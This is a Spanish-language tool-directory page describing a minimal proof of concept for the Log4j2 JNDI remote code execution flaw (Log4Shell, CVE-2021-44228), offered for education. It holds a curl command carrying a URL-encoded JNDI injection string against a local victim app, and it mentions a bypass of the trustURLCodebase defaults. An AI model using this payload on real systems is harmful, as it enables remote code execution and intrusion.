Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j2-rce-poc — Una prueba de concepto mínima para la vulnerabilidad Log4j2 JNDI RCE (CVE-2021-44228/Log4Shell). | Kitploit
Herramientas/GitHubGitHub/unlimitedsola/log4j2-rce-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

Una prueba de concepto mínima para la vulnerabilidad Log4j2 JNDI RCE (CVE-2021-44228/Log4Shell).

Ver Repositorio
32hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

POC de Vulnerabilidad RCE en Log4j2

Una prueba de concepto mínima para la vulnerabilidad de Ejecución Remota de Código JNDI en Log4j2 (CVE-2021-44228). Está destinada a fines educativos para ayudar a personas que no son investigadores de seguridad a entender cómo funciona y qué tan grande es el impacto.

La POC evita el requisito de establecer las propiedades com.sun.jndi.rmi.object.trustURLCodebase y com.sun.jndi.cosnaming.object.trustURLCodebase en true, las cuales fueron deshabilitadas por defecto desde 8u121, 7u131, 6u141.

Requisitos previos

  • JDK 1.8

Nota: Se requiere JDK 1.8 para compilar payload-server, pero la victim-app es vulnerable hasta JDK 15 porque el motor Nashorn fue eliminado en JDK 15.

Para probar

  1. Inicie el payload-server ejecutando:
root@kitploit:~
$ ./gradlew runPayloadServer
  1. Abra una nueva sesión de terminal y luego inicie la victim-app:
root@kitploit:~
$ ./gradlew runVictimApp
  1. Ejecute curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D para desencadenar la RCE.

  2. Para comprobar que el código remoto ha sido ejecutado, revise el registro de la consola de victim-app. Debería ver un registro no intencionado impreso en la pantalla.

Descargar herramienta